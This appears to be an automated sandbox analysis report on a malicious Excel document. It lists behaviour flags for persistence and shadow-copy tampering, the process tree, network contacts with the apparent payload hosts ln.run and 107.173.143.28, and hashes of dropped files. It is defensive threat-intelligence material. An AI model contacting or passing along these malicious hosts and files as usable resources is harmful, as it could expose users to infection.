N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 4676 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe
PID 3020 wrote to memory of 4676 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -Embedding

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 ln.run udp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:443 ln.run tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.161.67.172.in-addr.arpa udp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 28.143.173.107.in-addr.arpa udp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:80 ln.run tcp
NL 23.62.61.129:443 www.bing.com tcp
US 172.67.161.41:80 ln.run tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:443 ln.run tcp
US 107.173.143.28:80 107.173.143.28 tcp
US 172.67.161.41:80 ln.run tcp
US 172.67.161.41:443 ln.run tcp
US 8.8.8.8:53 224.162.46.104.in-addr.arpa udp
US 107.173.143.28:80 107.173.143.28 tcp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.162:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 162.61.62.23.in-addr.arpa udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 23.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/4868-0-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-4-0x00007FFFD856D000-0x00007FFFD856E000-memory.dmp

memory/4868-3-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-2-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-6-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-5-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-1-0x00007FFF98550000-0x00007FFF98560000-memory.dmp

memory/4868-9-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-11-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-10-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-12-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-13-0x00007FFF96100000-0x00007FFF96110000-memory.dmp

memory/4868-8-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-7-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-14-0x00007FFF96100000-0x00007FFF96110000-memory.dmp

memory/4868-15-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-16-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-19-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-18-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/4868-17-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/3020-40-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/3020-43-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7D5E7D2A-3B53-408B-B26D-98CEB025ABC1

MD5 6798e532bab05cca79e0fd03ab31fd4c
SHA1 5ce3208dfdffc43a8e8318829f61f7164ec8aaae
SHA256 c26198179bb8303c7374589ac5169bd4d6de1b92534c66c03759e5b260d99ba0
SHA512 2513d6bd8f05de0351f7a2c813023b17fb50df103cb6c7981bbd9e9fd202b7557c888b6b471db3a0e67879635a19b7bfc432778a9247d7f3e85fa801a46db7e1

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

MD5 4517ceaa188ee6541e0a53852a73611f
SHA1 02498c46cae0e62fe55ee0f2faac4f6493a13188
SHA256 98919f294d88ecdb8260caf01d9b671c97c1f361baa8d1de3ae3746f9bdebee1
SHA512 95f7f804a0c5a4e7a4ab1fe9019d601c1533a6531c022f1252f297aa899941bf925228a95e0ef5d168ac3a89f7fc7132fd9422a6b499b421061a7c32d82617ba

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

MD5 c578257aae50356a738800958da9eb6e
SHA1 e4c15fb5c2bef0145f5ee7d75f3d47773718bb5f
SHA256 81a6fc47aa0603a5d977faf61c270e1c96a18444163788cae9b3db48c2b7695d
SHA512 395ea9bc108ca59e02f6076cba9d3d4322b03493f2a8cb1eec2776bcb30e3fc44a50bd268cdefca0d9987db8740a31ec0310b2c945a883ceec07235aa2a2dcca

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VLW1SL5J\lionsarekingofjunglewhounderstandhowfastweareworkingonthejungleasakinglionsalwaysdoingattitudetounderstandheistheonlykinghave__entireworldkingsofjungle[1].doc

MD5 b11deda09cc2742d551b0d5dcd354ca0
SHA1 cce43ffeca6770177d14c42d06a820d089da4435
SHA256 df8f8da8b2d5f2bb64c4357fa298f64cd6522896dee8d10cd91616e4aad38cb9
SHA512 2e8ad1081fafdbf33733a14e8bb61e2f0960eee7dae2f0c562b817f2f86e33aa351c73ec6b2c700556b1f33fc4c0f08cd22c259e68a8bf645fa8d758e5485e17

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 8c40e987f3f489c73d66820d4000c0c3
SHA1 f4ddb46eb5a9bdb83399ae5bad5df456e055f9eb
SHA256 88953c52610276adf734074a98bd180fe924e9728fc7ebeac212208d83c0a4f1
SHA512 36750520b0cec5aa6f2519bb44b193e96d2e476a1b09bc8fdf82b444c150a788997e0f18538190ca1d6577cdab03369e5daec058b805c284b39ab9eec760bbc2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 c94762945b769b0a0b6b9d16a96bc9c2
SHA1 048a02cadbb7d171bd316eb0e675bbe683d9d09a
SHA256 10f125e5e6cccc7b50cd65c17352ee628bd91eb949631298d1b52d00cd1e7497
SHA512 b483c3d61d1e6fe0bcc1bc2182ec2913d5b05428d3939e2e9cc237f11483f9dec8165a678c3aeb5f61f8529bde6675835dfc5f8877ecbc7ad81626cdc16fc42c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 aa08ec878b05196c518d4db7d55e371b
SHA1 349148372278a8cb178f3ecd9fc827797db9ed91
SHA256 7a1ba6bbe0ce1e04178103a593cf3dfd6db1c1acbac1e028544c0848c030df22
SHA512 c2ec69ee95370317b02a79758a80f43c59d896efd3f432916b3d6c9a2af39d528347dd9358950a8100115a3967a8a0d2bdd0c14e121b63798618b8dc5103b201

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 159bd104d892e7906616083decdffd11
SHA1 d3c5bba03b676fbe1324695394a9884688a069ed
SHA256 24fe97cb2771af57c191a7d8ad8c0f33877c9c9ea3a0a9ea055ae0b5e3781a17
SHA512 055b5c697640640f0771ab737877e7779ea6e89d7564bd8ebbd95eaad4b187e095cc713b04e1af658e698665aab59b2cc4227cc59d86d2905e170ebb3f1a0c29

C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

MD5 0d91c00130074f9a2668e85a3d9cf780
SHA1 1268c4cb5ecabb8699163bba6c9418a89f4b4ca0
SHA256 c2c1964a535066c396094764a558a6b087b0c17cdd8b662cd3f144eb283f4c95
SHA512 83c71c4cb3ea78f5e4c232bca63b8368c67c68864c3965b51ff2c1fcb0538f1b5c85c17a2db048d58f89dbf6c761f4eda6c7a352ff2bea531906e404647bbd58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

MD5 a67829b3f9cd840d7d4828ccc4e4ab5b
SHA1 14fba66b7a715326401e0b36f464e713f1885ff3
SHA256 c0199a176d0c1c7a5b6a5bf4cffdf6ce0e81d6a89b2b5194233a567b03955c1f
SHA512 59237d08d45effe25ff0f13ea1edce03f2821891ead67216153ac843eccc2fbae82c210b0993dff9addf36d668b3cf62b2eadfb7917aa886a14baed1c863a94b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

MD5 23fe130785de42f0ca6f030ec6aefa17
SHA1 2d1224a3844fdd21d3973ad343e3173348e8692f
SHA256 cd08570440bd2d949130d1effa6bb8e35ea8a14cf44f6db0dba4245380a840fd
SHA512 4d2f9141c672acac9e8244b87aa1ce6363a3be02d9f672308276d010b319ad4242cbbfeb2da1f6992424305f43db59ae8125312fd91e8327552a560b9d5e057c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 a95b7c349f9fa30b722212ab8671eb06
SHA1 49c6289fb8c0fc8a2dfdfdd70a40a4d1b614577a
SHA256 a80933ba09720bba39d196579fe764aedab900eb1e4a9dca783101d9ad6b4d4f
SHA512 4f971ae29f904be8fdf48ad6cd640034ab978b69c794d62f289495494cade5c0bb02365c44e560f6215a76a4222e8534f257c17250ae5fd870ec99448c1813fd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 1bd54f91cfabfe3c96811aa4f4b99357
SHA1 05a0fa847023a2836dd32c9a98d3be03339947fa
SHA256 27bba482190f6d1faa770d3129666a956ff6eab469e115ad195baf95c926b70a
SHA512 570407e842d2c78d95e74c6a6b9eb9f557974cefa7d078b0b30a4967ce64997d09175bec46e39e380928dbcc2ad7bef14f3518e468366f14f4033cea1f20deef

C:\Users\Admin\AppData\Local\Temp\TCDAC43.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

memory/4868-518-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp

memory/3020-573-0x00007FFFD84D0000-0x00007FFFD86C5000-memory.dmp